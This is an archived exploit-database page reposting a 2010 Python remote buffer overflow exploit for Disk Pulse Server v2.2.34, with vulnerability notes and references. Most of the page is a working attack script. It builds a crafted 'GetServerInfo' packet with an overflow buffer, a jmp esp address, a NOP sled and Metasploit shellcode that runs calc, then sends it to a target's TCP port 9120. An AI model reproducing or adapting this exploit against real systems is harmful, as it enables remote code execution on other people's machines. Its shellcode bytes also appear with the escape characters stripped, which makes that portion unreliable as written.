Home / os / win7

[remote exploits] - Disk Pulse Server v2.2.34 Remote Buffer

Posted on 12 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit by xsploited security in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================
Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
========================================================

#!/usr/bin/python
 
# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Date: 10/11/2010
# Author: xsploited security
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] gmail.com
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe
# Version: v2.2.34
# Tested on: Windows XP SP3 (Physical machine)
# CVE : N/A
 
# Vulnerability Information:
# A vulnerability exists in the way Disk Pulse Server v2.2.34 process a remote clients &quot;GetServerInfo&quot; request.
# The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.
 
# Other notes:
# It appears the vendor likes using the same server code (that was effected by my previous PoC: http://www.exploit-db.com/exploits/15231)
# for everything client/server related. It is also safe to say that the client(s) are most likely effected by bugs as well.
 
# Other possibly affected versions:
# Disk Pulse Server &lt;= 1.7.x
 
# References:
# http://secunia.com/advisories/41748/
# http://www.exploit-db.com/exploits/15231
# http://securityreason.com/exploitalert/9247
 
# Shouts:
# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.
 
import sys,socket
 
if len(sys.argv) != 2:
    print &quot;[!] Usage: ./diskpulse.py &lt;Target IP&gt;&quot;
    sys.exit(1)
 
about = &quot;=================================================
&quot;
about += &quot;Title: Disk Pulse Server v2.2.34 Remote BOF PoC
&quot;
about +=  &quot;Author: xsploited security
URL: http://www.x-sploited.com/
&quot;
about +=  &quot;Contact: xsploitedsecurity [at] gmail.com
&quot;
about +=  &quot;=================================================
&quot;
print about
 
host = sys.argv[1]
port = 9120 #default server port
 
# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = (&quot;x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c&quot;
&quot;x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99&quot;
&quot;x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8&quot;
&quot;x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0&quot;
&quot;xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5&quot;
&quot;xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58&quot;
&quot;x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb&quot;
&quot;xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1&quot;
&quot;x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b&quot;
&quot;xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34&quot;
&quot;xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c&quot;
&quot;x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b&quot;
&quot;x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab&quot;
&quot;x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10&quot;
&quot;xc4x73x5fx73xf6xe0xe9x10&quot;);
     
# Begin payload buffer:
 
packet_header = (&quot;x47x65x74x53x65x72x76x65x72x49x6Ex66x6Fx02&quot;);       # ASCII = &quot;GetServerInfo.&quot;
 
junk = &quot;x41&quot; * 256;            #256 byte junk buffer to reach eip
eip = &quot;xFBxF8xABx71&quot;;       #jmp esp (via ws2_32.dll)
nops = &quot;x90&quot; * 12;             #small nop sled
 
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops;
 
print &quot;[*] Connecting to &quot; + host + &quot;...
&quot;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print &quot;[*] Connected, Sending payload
&quot;
s.send(packet + &quot;
&quot;)
print &quot;[*] Payload sent successfully&quot;
print &quot;[*] Check the results
&quot;
s.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]</pre></body></html>

 

TOP

Malware :

Exploits :